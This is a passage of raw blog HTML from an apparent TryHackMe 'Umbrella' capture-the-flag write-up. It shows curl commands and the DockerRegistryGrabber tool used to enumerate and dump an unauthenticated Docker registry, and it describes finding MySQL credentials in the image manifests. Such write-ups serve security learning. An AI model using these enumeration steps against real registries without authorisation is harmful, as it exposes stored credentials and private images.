data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"2.-image\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?fit=1024%2C78&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?resize=1024%2C78&#038;ssl=1\" alt=\"\" class=\"wp-image-109\" style=\"width:1352px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?resize=1024%2C78&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?resize=300%2C23&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?resize=768%2C58&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?w=1396&amp;ssl=1 1396w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Authentication<\/mark><\/h2>\n\n\n\n<p>The Docker registry may also be configured to require <strong>authentication<\/strong>:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"curl -k https:\/\/192.25.197.3:5000\/v2\/_catalog\n#If Authentication required\n{&quot;errors&quot;:[{&quot;code&quot;:&quot;UNAUTHORIZED&quot;,&quot;message&quot;:&quot;authentication required&quot;,&quot;detail&quot;:[{&quot;Type&quot;:&quot;registry&quot;,&quot;Class&quot;:&quot;&quot;,&quot;Name&quot;:&quot;catalog&quot;,&quot;Action&quot;:&quot;*&quot;}]}]}\n#If no authentication required\n{&quot;repositories&quot;:[&quot;alpine&quot;,&quot;ubuntu&quot;]}\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-k<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">https:\/\/192.25.197.3:5000\/v2\/_catalog<\/span><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#If Authentication required<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><span style=\"color: #FFCB6B\">&quot;errors&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">[{&quot;<\/span><span style=\"color: #FFCB6B\">code<\/span><span style=\"color: #FFCB6B\">&quot;:&quot;<\/span><span style=\"color: #FFCB6B\">UNAUTHORIZED<\/span><span style=\"color: #FFCB6B\">&quot;,&quot;<\/span><span style=\"color: #FFCB6B\">message<\/span><span style=\"color: #FFCB6B\">&quot;:&quot;<\/span><span style=\"color: #FFCB6B\">authentication<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">required<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">detail<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:[{<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Type<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">registry<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Class<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:<\/span><span style=\"color: #89DDFF\">&quot;&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Name<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">catalog<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Action<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">}]}]}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">#If no authentication required<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">{<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">repositories<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:[<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">alpine<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">ubuntu<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">]}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:38px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>In our case, we do not require authentication.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"71\" data-attachment-id=\"112\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/3-images\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?fit=1393%2C96&amp;ssl=1\" data-orig-size=\"1393,96\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"3.-Images\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?fit=1024%2C71&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?resize=1024%2C71&#038;ssl=1\" alt=\"\" class=\"wp-image-112\" style=\"width:1327px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?resize=1024%2C71&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?resize=300%2C21&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?resize=768%2C53&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?w=1393&amp;ssl=1 1393w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">DockerRegistryGrabber<\/mark><\/h3>\n\n\n\n<p>We can run the tool to list all docker registries. We only have one<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/Tools\/DockerRegistryGrabber]\n\u2514\u2500$ python3 drg.py http:\/\/10.10.166.146 --list     \n[+] umbrella\/timetracking  \" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/Tools\/DockerRegistryGrabber<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">drg.py<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.166.146<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">--list<\/span><span style=\"color: #BABED8\">     <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> umbrella\/timetracking  <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:31px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can now dump the registry by running the below command:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/Tools\/DockerRegistryGrabber]\n\u2514\u2500$ python3 drg.py http:\/\/10.10.166.146 --dump_all\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/Tools\/DockerRegistryGrabber<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">drg.py<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.166.146<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">--dump_all<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"551\" data-attachment-id=\"113\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/5-image\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?fit=1365%2C734&amp;ssl=1\" data-orig-size=\"1365,734\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"5.-Image\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?fit=1024%2C551&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?resize=1024%2C551&#038;ssl=1\" alt=\"\" class=\"wp-image-113\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?resize=1024%2C551&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?resize=300%2C161&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?resize=768%2C413&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?w=1365&amp;ssl=1 1365w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:37px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The output will be a bunch of tar files informally called as &#8220;blobs&#8221;.<\/p>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>When you build a Docker image, each instruction in the Dockerfile creates a new layer. These layers are stored in a Docker image registry, such as Docker Hub. The term \u201cblob\u201d might be informally used to refer to these layers or the binary data associated with them.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"294\" data-attachment-id=\"120\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/6-image\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?fit=1337%2C384&amp;ssl=1\" data-orig-size=\"1337,384\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"6.-Image\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?fit=1024%2C294&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?resize=1024%2C294&#038;ssl=1\" alt=\"\" class=\"wp-image-120\" style=\"width:1066px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?resize=1024%2C294&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?resize=300%2C86&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?resize=768%2C221&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?w=1337&amp;ssl=1 1337w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:29px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>We will need to extract these files in a separate folders so that they don\u2019t get override<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>I tried going through all the files but couldn&#8217;t find anything useful. So I decided to move on with further enumeration.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Enumerating With cURL<\/mark><\/h2>\n\n\n\n<p>Once you <strong>obtained access to the docker registry<\/strong> here are some commands you can use to enumerate it:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"#List repositories\ncurl -s http:\/\/10.10.10.10:5000\/v2\/_catalog\n{&quot;repositories&quot;:[&quot;alpine&quot;,&quot;ubuntu&quot;]}\n\n#Get tags of a repository\ncurl -s http:\/\/192.251.36.3:5000\/v2\/ubuntu\/tags\/list\n{&quot;name&quot;:&quot;ubuntu&quot;,&quot;tags&quot;:[&quot;14.04&quot;,&quot;12.04&quot;,&quot;18.04&quot;,&quot;16.04&quot;]}\n\n#Get manifests\ncurl -s http:\/\/192.251.36.3:5000\/v2\/ubuntu\/manifests\/latest\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#List repositories<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.10.10:5000\/v2\/_catalog<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><span style=\"color: #FFCB6B\">&quot;repositories&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">[<\/span><span style=\"color: #FFCB6B\">&quot;alpine&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;ubuntu&quot;<\/span><span style=\"color: #FFCB6B\">]}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#Get tags of a repository<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/192.251.36.3:5000\/v2\/ubuntu\/tags\/list<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><span style=\"color: #FFCB6B\">&quot;name&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #FFCB6B\">&quot;ubuntu&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;tags&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">[<\/span><span style=\"color: #FFCB6B\">&quot;14.04&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;12.04&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;18.04&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;16.04&quot;<\/span><span style=\"color: #FFCB6B\">]}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#Get manifests<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/192.251.36.3:5000\/v2\/ubuntu\/manifests\/latest<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Carefully going through the output, we will see MySQL database credentials.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"717\" height=\"331\" data-attachment-id=\"126\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/db-creds\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?fit=717%2C331&amp;ssl=1\" data-orig-size=\"717,331\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"db-creds\" data-image-description=\"\" data-image-caption=\"\" 